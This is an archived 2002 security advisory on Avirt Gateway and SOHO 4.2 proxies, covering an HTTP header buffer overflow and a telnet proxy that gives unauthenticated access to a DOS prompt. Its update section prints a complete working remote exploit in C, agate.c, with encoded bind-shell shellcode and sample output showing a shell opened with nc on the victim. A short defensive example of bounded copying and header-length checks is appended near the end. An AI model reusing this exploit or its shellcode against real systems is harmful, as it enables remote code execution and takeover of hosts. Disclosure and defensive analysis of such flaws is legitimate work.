
Avirt proxy and gateway suites contain buffer overflows and allow remote access
18th Jan 2002 [SBWID-5008]
COMMAND

	Avirt proxy and gateway suites contain buffer overflows and allow remote
	access

SYSTEMS AFFECTED

	 Avirt SOHO v4.2

	 Avirt Gateway v4.2

	 Avirt Gateway Suite v4.2

	

PROBLEM

	From the Strumpf Noir Society advisory [http://labs.secureance.com]:

	 Buffer Overflow
	 ===============

	

	The problem appears to be due to incorrect bounds checking of the header
	fields for the standard HTTP proxy (port 8080 by default). If these
	headers exceed 2319 bytes in size, the corresponding buffer will
	overflow.

	Besides allowing a DoS attack against a vulnerable system, this could be
	exploited to execute arbitrary code on the host, since EIP is
	overwritten. These Avirt products run as an NT system service by
	default.
	

	 Remote access
	 =============

	

	The Avirt Gateway technology integrated in the Gateway Suite contains,
	amongst others, a telnet proxy. Due to an error in the implementation
	of this proxy inside the Gateway Suite, however, the system on which it
	is installed is effectively turned into an insecure telnet server.

	To exploit this flaw, an attacker would only have to telnet to the
	telnet proxy (running on port 23 in a default installation) and could
	then browse the system's file structure using the 'dir' and/or 'ls'
	commands. Typing 'dos' after connecting to the target machine would
	drop the attacker into a DOS prompt. No authentication is required
	other than connecting from an IP address in one of the proxy's allowed
	ranges.
	

	 Update (14 February 2002)
	 =========================

	

	Exploit code :
	

	

	Avirt Gateway 4.2 remote buffer overflow: proof of concept

	

	Release Date:

	February 12, 2002

	

	Systems tested:

	Avirt Gateway v4.2 [build 4807] on Windows 2000, SP2

	

	These products can be found at vendor Avirt's web site:

	http://www.avirt.com

	

	Description:
	The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely
	exploitable buffer overflow which allows execution of arbitrary code.
	Entering a string of about 510 bytes at the "Ready>" prompt will
	overwrite EIP.
	Exploit will bind a shell to a specified port on the attacked host.

	

	Example:
	bash-2.05$ agate 10.0.0.1 7007

	Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)

	initialising socket
	...initialized
	trying to connect
	...connected
	(waiting)
	sending exploit
	...sent
	(waiting)
	...closed
	shell bound to port 7007
	bash-2.05$ nc -v target 7007
	target [10.0.0.1] 7007 (?) open
	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-2000 Microsoft Corp.

	C:\>

	

	

	Exploit:
	-----------------------------------cut---------------------------------------------------------
	/* agate.c by uid0x00
	 * Avirt Gateway 4.2 remote exploit
	 * compile with gcc agate.c -o agate
	 *
	 * tested with win2k, sp2
	 *
	 * thx to ByteRage, exploit is based on his shellcode
	 */

	/* Set the following three defines according to the DLL we use */

	// MSVCRT.DLL version 6.10.8924.0 (win2K)
	#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
	#define GetProcAddressRefADD "\xFC"
	#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

	#include <stdio.h>
	#include <stdlib.h>      /* atoi */
	#include <string.h>      /* memset, memcpy */
	#include <unistd.h>      /* sleep, close */
	#include <errno.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>   /* inet_addr */

	int main(int argc, char *argv[]) {
	   int s;
	   struct sockaddr_in SockAdr;
	   char exploit[1024];
	   unsigned short int      a_port;

	   char shellcode[] =

	/* ==== SHELLC0DE START ==== */
	/* shellcode based on ByteRage's 450byte code (thx for your help man!) */
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
	"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
	"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
	"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
	"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
	"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
	"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
	"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
	"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
	"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
	"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
	"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
	"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
	"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
	"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
	"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
	"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
	"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
	"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
	"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
	"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
	"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";
	/* ==== SHELLC0DE ENDS ==== */

	   printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");

	   if(argc < 3) {
	     printf("usage:\t%s <ip#> <port#>\n", argv[0]);
	     return 0;
	   }

	   //insert shell port (the shellcode's byte string is XOR-encoded with 0x99)
	   a_port = htons(atoi(argv[2]));
	   a_port ^= 0x9999;
	   shellcode[964] = (a_port) & 0xff;
	   shellcode[965] = (a_port >> 8) & 0xff;

	   //init the exploit buffer (fill all of it; the original memset only
	   //covered 0x200 bytes, so the tail of the 1024-byte send was uninitialised)
	   memset(exploit, '\xCC', sizeof(exploit));
	   memcpy(exploit, shellcode, sizeof(shellcode)-1);

	   printf("initialising socket\n");
	   s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
	   if (s >= 0) {   /* socket() returns -1 on failure; the original tested 'if (s)' */
	     printf("...initialized\n");

	     memset(&SockAdr, 0, sizeof(SockAdr));
	     SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
	     SockAdr.sin_family = AF_INET;
	     SockAdr.sin_port = htons(23);

	     printf("trying to connect\n");
	     if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
	       printf("...connected\n");
	       printf("(waiting)\n");
	       sleep(3);

	       printf("sending exploit\n");
	       send(s, exploit, sizeof(exploit), 0);
	       printf("...sent\n");

	       printf("(waiting)\n");
	       sleep(3);

	       printf("...closed\nshell bound to port %s \n", argv[2]);
	       close(s);
	     }
	     else {
	       printf("... failed :( errno = %i\n", errno);
	       close(s);
	       return(0);
	     }
	   }
	   return 0;
	}
	-----------------------------------cut---------------------------------------------------------

	

	Disclaimer:

	The information within this paper may change without notice. Use of this

	information constitutes acceptance for use in an AS IS condition. There are

	NO warranties with regard to this information. In no event shall the author

	be liable for any damages whatsoever arising out of or in connection with

	the use or spread of this information. Any use of this information is at the

	user's own risk.

	

	Copyright Information:

	Permission is hereby granted for the redistribution of this paper

	electronically. It is not to be edited in any way without express consent of

	the author. If you wish to reprint the whole or any part of this alert in any

	other medium excluding electronic medium, please e-mail uid0x00@haked.com for

	permission.

	

	uid0x00

	EOF
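	Both overflows in this advisory (the HTTP proxy's header fields beyond 2319 bytes and the telnet proxy's "Ready>" line at about 510) come down to a fixed buffer filled with no length check. The following C is an added example, not Avirt's code (whose source is not public) and not part of either advisory: it shows the unbounded copy next to a bounded one using the advisory's limits, and a check that walks a raw HTTP request's header block and reports the first line over the limit, as a proxy or an IDS preprocessor would before any field is copied. The request builder and the example.test host are constructed test inputs.

```c
#include <string.h>

/* Limits from the advisory: HTTP proxy header field 2319 bytes, telnet "Ready>" line ~510. */
#define HTTP_HEADER_MAX 2319
#define TELNET_LINE_MAX 510

/* Unbounded copy, shown for contrast: a line of at least the buffer's size overruns 'field'. */
void copy_field_unbounded(char *field, const char *line) { strcpy(field, line); }

/* Bounded copy into a 'cap'-byte buffer: returns bytes copied, or -1 (and
 * writes nothing) when the line plus its terminating NUL would not fit. */
int copy_field_bounded(char *field, size_t cap, const char *line) {
    size_t n = 0;
    while (n < cap && line[n] != '\0') n++;
    if (n >= cap) return -1;
    memcpy(field, line, n + 1);
    return (int)n;
}

/* Walk the header block of a raw HTTP request (CRLF line ends, block ends at
 * an empty line) and return the 1-based index of the first line longer than
 * 'limit', or 0 if every line fits: the check to run before any field copy. */
int first_oversized_header(const char *req, size_t limit) {
    int idx = 0;
    const char *p = req;
    while (*p != '\0') {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len == 0) break;            /* empty line: end of headers */
        idx++;
        if (len > limit) return idx;
        if (!eol) break;
        p = eol + 2;
    }
    return 0;
}

/* Constructed test input (hypothetical host): one header whose value is
 * 'value_len' bytes of 'A'. Returns 0, or -1 if it does not fit in 'out'. */
int build_padded_request(char *out, size_t cap, size_t value_len) {
    const char *head = "GET http://example.test/ HTTP/1.0\r\nX-Pad: ";
    size_t hl = strlen(head);
    if (hl + value_len + 5 > cap) return -1;
    memcpy(out, head, hl);
    memset(out + hl, 'A', value_len);
    memcpy(out + hl + value_len, "\r\n\r\n", 5);
    return 0;
}
```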

	

	

SOLUTION

	None yet
